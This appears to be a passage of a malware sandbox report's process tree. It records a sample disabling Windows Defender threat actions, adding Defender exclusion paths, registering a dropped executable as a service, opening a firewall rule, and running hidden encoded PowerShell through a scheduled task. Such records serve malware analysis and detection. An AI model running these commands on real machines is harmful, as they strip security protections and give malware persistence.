                                                                            PID:5072
                                                                          • C:\Users\Admin\msainvkz.exe
                                                                            "C:\Users\Admin\msainvkz.exe" /d"C:\Users\Admin\Documents\XRXPq2PSXIfSKpZN2gFK4peo.exe"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Checks computer location settings
                                                                            PID:5448
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ttaflenk.exe" C:\Windows\SysWOW64\rrducxh\
                                                                              2⤵
                                                                                PID:6128
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                "C:\Windows\System32\sc.exe" config rrducxh binPath= "C:\Windows\SysWOW64\rrducxh\ttaflenk.exe /d\"C:\Users\Admin\msainvkz.exe\""
                                                                                2⤵
                                                                                  PID:4588
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  "C:\Windows\System32\sc.exe" start rrducxh
                                                                                  2⤵
                                                                                    PID:1088
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                    2⤵
                                                                                      PID:5168
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1128.bat" "
                                                                                      2⤵
                                                                                        PID:4884
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1052
                                                                                        2⤵
                                                                                        • Program crash
                                                                                        PID:5568
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4572 -ip 4572
                                                                                      1⤵
                                                                                        PID:5488
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3548 -ip 3548
                                                                                        1⤵
                                                                                          PID:5000
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2212 -ip 2212
                                                                                          1⤵
                                                                                            PID:4628
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3548 -ip 3548
                                                                                            1⤵
                                                                                              PID:5548
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3348 -ip 3348
                                                                                              1⤵
                                                                                                PID:5612
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3548 -ip 3548
                                                                                                1⤵
                                                                                                  PID:5952
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3548 -ip 3548
                                                                                                  1⤵
                                                                                                    PID:5128
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5448 -ip 5448
                                                                                                    1⤵
                                                                                                      PID:1496
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3548 -ip 3548
                                                                                                      1⤵
                                                                                                        PID:5692
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3548 -ip 3548
                                                                                                        1⤵
                                                                                                          PID:5760
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3548 -ip 3548
                                                                                                          1⤵
                                                                                                            PID:1948
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                            1⤵
                                                                                                              PID:4944
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                2⤵
                                                                                                                  PID:5536
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                1⤵
                                                                                                                  PID:5580
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:4720
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:1128
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\XrgzNGi.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\XrgzNGi.exe j6 /site_id 525403 /S
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Drops file in System32 directory
                                                                                                                      PID:1560
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                        2⤵
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:5648
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:2400
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                              4⤵
                                                                                                                                PID:4920
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:6016
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:2872
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:5336
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:4388
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:5320
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:4648
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:4040
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:3912
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:1276
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:2228
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2716
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1748
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5204
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2500
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3460
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4292
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:2260
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5324
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3232
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5308
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4860
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5848
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4988
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          PID:5960
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5912
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1180
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:668
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4408
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4492
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2440
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4392
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4280
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5488
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:3960
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5828
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5012
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:2416
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4472
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:456
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2664
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2804
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "gBdWGYQKM" /SC once /ST 10:18:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:3004
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /run /I /tn "gBdWGYQKM"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4296
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:4356
                                                                                                                                                                                                              • C:\Windows\system32\gpupdate.exe
